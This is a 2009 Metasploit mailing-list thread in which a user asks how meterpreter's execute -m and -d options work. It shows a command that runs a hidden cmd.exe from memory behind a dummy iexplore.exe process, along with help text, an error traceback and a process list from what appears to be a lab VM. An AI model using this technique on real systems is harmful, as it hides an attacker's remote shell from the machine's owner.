Metasploit mailing list archives
meterpreter execute from memory
From: reydecopas at gmail.com (reydecopas)
Date: Tue, 3 Feb 2009 16:19:03 +0100
Ok, clear enough... -f local_EXE_file

meterpreter > execute -f cmd.exe -H -i -m -d c:\\progra~1\\intern~1\\iexplore.exe
Process 176 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\Desktop>tasklist
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         16 K
System                         4 Console                 0        212 K
smss.exe                     328 Console                 0        372 K
csrss.exe                    584 Console                 0      3,328 K
winlogon.exe                 608 Console                 0      5,096 K
services.exe                 652 Console                 0      3,644 K
savedump.exe                 664 Console                 0      2,388 K
lsass.exe                    672 Console                 0      1,308 K
svchost.exe                  824 Console                 0      4,284 K
svchost.exe                  892 Console                 0      3,728 K
svchost.exe                  988 Console                 0     15,736 K
svchost.exe                 1048 Console                 0      2,844 K
svchost.exe                 1200 Console                 0      4,184 K
explorer.exe                1400 Console                 0     16,448 K
spoolsv.exe                 1540 Console                 0      4,064 K
VBoxTray.exe                1640 Console                 0      1,896 K
VBoxService.exe             1972 Console                 0      1,260 K
wscntfy.exe                  492 Console                 0      1,736 K
alg.exe                      832 Console                 0      3,144 K
wuauclt.exe                 1444 Console                 0      6,232 K
met-rev.exe                 1668 Console                 0      3,084 K
procexp.exe                 1580 Console                 0      6,604 K
wmiprvse.exe                1936 Console                 0      5,588 K
IEXPLORE.EXE                 176 Console                 0      1,516 K
tasklist.exe                2036 Console                 0      3,964 K

C:\Documents and Settings\admin\Desktop>

On Tue, Feb 3, 2009 at 3:32 PM, reydecopas <reydecopas at gmail.com> wrote:
Hi,
I don't understand the parameters of execute command (-d -m)
This works perfect:
meterpreter > execute -f cmd.exe -H -i
Process 1220 created.
Channel 33 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\admin\Desktop>
but when does it make sense to use -d and -m parameters?
Can anyone send an example?
meterpreter > execute -h
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token
I get this error:
meterpreter > execute -f cmd.exe -H -i -d calc.exe -m
[-] Error running command execute: No such file or directory - cmd.exe
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `initialize'
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `new'
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `execute'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:120:in `cmd_execute'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in `call'
/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in `run'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
/home/user/metasploit/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'
/home/user/metasploit/lib/rex/ui/interactive.rb:48:in `interact'
/home/user/metasploit/lib/msf/ui/console/command_dispatcher/core.rb:918:in `cmd_sessions'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/user/metasploit/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/user/metasploit/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
